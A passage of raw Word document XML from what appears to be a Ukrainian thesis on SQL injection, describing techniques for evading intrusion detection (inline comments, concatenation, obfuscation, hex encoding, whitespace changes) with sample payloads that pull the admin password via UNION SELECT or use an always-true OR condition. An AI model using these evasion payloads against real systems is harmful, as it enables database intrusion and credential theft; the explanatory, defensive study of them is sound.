    <w:p w14:paraId="1BC40B7F" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="00D84A48" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Також можна використати коментарі в ключових словах</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF9BBF6" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="00D84A48" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>‘/**/UNI/**/ON/**/SEL/**/ECT/**/PASSWORD/**/FR/**/OM/**/USERS/**/WH/**/ERE/**/USERNAME/**/LIKE/**/’ADMIN’ - -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69ACA860" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Ця техніка ухилення є успішною коли фільтруються пробіли в рядку введення. Ця техніка створює SQL запит, що є синтаксично неправильним, але дійсним і дозволяє пройти різні фільтри. Вбудований коментар дозволяє атакуючому написати SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00C55233">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>оператор без пробілів.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC46D2D" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="008861B4" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D9D2C51" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="00C0553F" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="993"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="98" w:name="_Toc516752152"/>
      <w:bookmarkStart w:id="99" w:name="_Toc30433140"/>
      <w:r w:rsidRPr="00C0553F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">2.8.3 </w:t>
      </w:r>
      <w:r w:rsidRPr="00C0553F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0553F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C0553F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>concatenation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="98"/>
      <w:bookmarkEnd w:id="99"/>
    </w:p>
    <w:p w14:paraId="21B9F885" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="008861B4" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="767FB8AA" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="00D84A48" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Ця техніка розбиває одну строку на декілька частин і об’єднує їх на рівні SQL. Движок SQL будує єдину строку з багатьох частин. Таким чином, атакуючий використовує конкатенацію для дроблення ключових слів для уникнення IDS. Синтаксис конкатенації може змінюватись залежно від баз даних.</w:t>
      </w:r>
      <w:r w:rsidRPr="002B7D87">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Єдиний рядок може бути розбитий на дві частини і після з’єднаний за допомогою символу “+”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7902AC45" w14:textId="290224AF" w:rsidR="00101F0F" w:rsidRPr="00636AF5" w:rsidRDefault="00A419FD" w:rsidP="00636AF5">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>“OR ‘</w:t>
      </w:r>
      <w:r w:rsidRPr="00C55233">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Simple’=’Sim+ple’</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E5FDEEF" w14:textId="77777777" w:rsidR="00101F0F" w:rsidRPr="008861B4" w:rsidRDefault="00101F0F" w:rsidP="00A419FD">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64ADA164" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="00C0553F" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="993"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="100" w:name="_Toc516752153"/>
      <w:bookmarkStart w:id="101" w:name="_Toc30433141"/>
      <w:r w:rsidRPr="00C0553F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">2.8.4 </w:t>
      </w:r>
      <w:r w:rsidRPr="00C0553F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Obfuscated Code</w:t>
      </w:r>
      <w:bookmarkEnd w:id="100"/>
      <w:bookmarkEnd w:id="101"/>
    </w:p>
    <w:p w14:paraId="741575C8" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="008861B4" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76546E8B" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="00A419FD" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A419FD">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Є два методи для заплутування зловмисного SQL запиту, щоб уникнути виявлення IDS. Більшість атакуючих заплутують зловмисний SQL запит використовуючи наступні два методи:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2021B220" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="00A419FD" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:suppressAutoHyphens/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A419FD">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Wrapping</w:t>
      </w:r>
      <w:r w:rsidRPr="00A419FD">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>. Атакуючий використовує утиліту для заплутування SQL-запиту, і потім відправляє його до бази даних. Сигнатури IDS не виявлять такий заплутаний запит і дозволять йому пройти через себе.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65943F82" w14:textId="0D33DC28" w:rsidR="00636AF5" w:rsidRDefault="00A419FD" w:rsidP="0019135A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:suppressAutoHyphens/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A419FD">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4163">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A419FD">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4163">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A419FD">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>obfuscation</w:t>
      </w:r>
      <w:r w:rsidRPr="00A419FD">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">. В SQL </w:t>
      </w:r>
      <w:r w:rsidRPr="00A419FD">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4163">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A419FD">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>obfuscation</w:t>
      </w:r>
      <w:r w:rsidRPr="00A419FD">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> методі, заплутаний SQL рядок використовує конкатенацію, зашифровує і хешує рядок, після розшифровує їх під час виконання. Заплутування рядка з цією технікою не виявляється сигнатурами IDS, це дозволяє атакуючому обійти її.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1991A07B" w14:textId="77777777" w:rsidR="002F1513" w:rsidRPr="002F1513" w:rsidRDefault="002F1513" w:rsidP="002F1513">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:suppressAutoHyphens/>
        <w:ind w:left="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BF45074" w14:textId="49E937F9" w:rsidR="0019135A" w:rsidRDefault="0019135A" w:rsidP="0019135A">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="993"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="102" w:name="_Toc30433142"/>
      <w:r w:rsidRPr="00C0553F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>2.8.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0553F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0019135A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Hex encoding</w:t>
      </w:r>
      <w:bookmarkEnd w:id="102"/>
    </w:p>
    <w:p w14:paraId="1315399B" w14:textId="77777777" w:rsidR="0019135A" w:rsidRPr="0019135A" w:rsidRDefault="0019135A" w:rsidP="0019135A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BC1E0BB" w14:textId="77777777" w:rsidR="0019135A" w:rsidRPr="0019135A" w:rsidRDefault="0019135A" w:rsidP="0019135A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="432"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0019135A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Атакуючий використовує шістнадцяткове кодування для заплутування запиту </w:t>
      </w:r>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL </w:t>
      </w:r>
      <w:r w:rsidRPr="0019135A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">так що він не буде виявлений по сигнатурі так як більшість </w:t>
      </w:r>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">IDSs </w:t>
      </w:r>
      <w:r w:rsidRPr="0019135A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">не розпізнають шістнадцяткового кодування. Атакуючий експлуатує ці </w:t>
      </w:r>
      <w:r w:rsidRPr="0019135A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>IDSs</w:t>
      </w:r>
      <w:r w:rsidRPr="0019135A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> для проходження їхніх </w:t>
      </w:r>
      <w:r w:rsidRPr="0019135A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="0019135A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> опрацьованих входів. Шістнадцяткове кодування забезпечує незліченну кількість шляхів атакуючому для заплутування кожної </w:t>
      </w:r>
      <w:r w:rsidRPr="0019135A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="0019135A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23FBE9E8" w14:textId="522B875C" w:rsidR="0019135A" w:rsidRPr="00101F0F" w:rsidRDefault="0019135A" w:rsidP="0019135A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34CCF8BC" w14:textId="516D9D3D" w:rsidR="0019135A" w:rsidRDefault="0019135A" w:rsidP="0019135A">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="993"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="103" w:name="_Toc30433143"/>
      <w:r w:rsidRPr="00C0553F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>2.8.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0553F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0019135A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Manipulating White Space</w:t>
      </w:r>
      <w:bookmarkEnd w:id="103"/>
    </w:p>
    <w:p w14:paraId="7536031A" w14:textId="3421E366" w:rsidR="0019135A" w:rsidRDefault="0019135A" w:rsidP="0019135A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="620EB85F" w14:textId="77777777" w:rsidR="0019135A" w:rsidRPr="0019135A" w:rsidRDefault="0019135A" w:rsidP="0019135A">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>White</w:t>
      </w:r>
      <w:r w:rsidRPr="0019135A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>space</w:t>
      </w:r>
      <w:r w:rsidRPr="0019135A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>manipulation</w:t>
      </w:r>
      <w:r w:rsidRPr="0019135A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> техніка заплутує строку введення видаляючи або додаючи пробіли між ключовими словами і рядком або числовими літералами без зміни виконання </w:t>
      </w:r>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="0019135A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> запиту.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C3FB63" w14:textId="77777777" w:rsidR="0019135A" w:rsidRPr="0019135A" w:rsidRDefault="0019135A" w:rsidP="0019135A">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0019135A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Додаючи пробіли використовуючи спеціальні символи такі як </w:t>
      </w:r>
      <w:r w:rsidRPr="0019135A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">tab, </w:t>
      </w:r>
      <w:r w:rsidRPr="0019135A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>повернену каретку</w:t>
      </w:r>
      <w:r w:rsidRPr="0019135A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="0019135A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>переклади рядка робить оператор SQL нерозпізнаним, не змінюючи виконання.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8FEDDE" w14:textId="77777777" w:rsidR="0019135A" w:rsidRPr="005027FB" w:rsidRDefault="0019135A" w:rsidP="0019135A">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="0019135A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>UNION</w:t>
      </w:r>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0019135A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">” </w:t>
      </w:r>
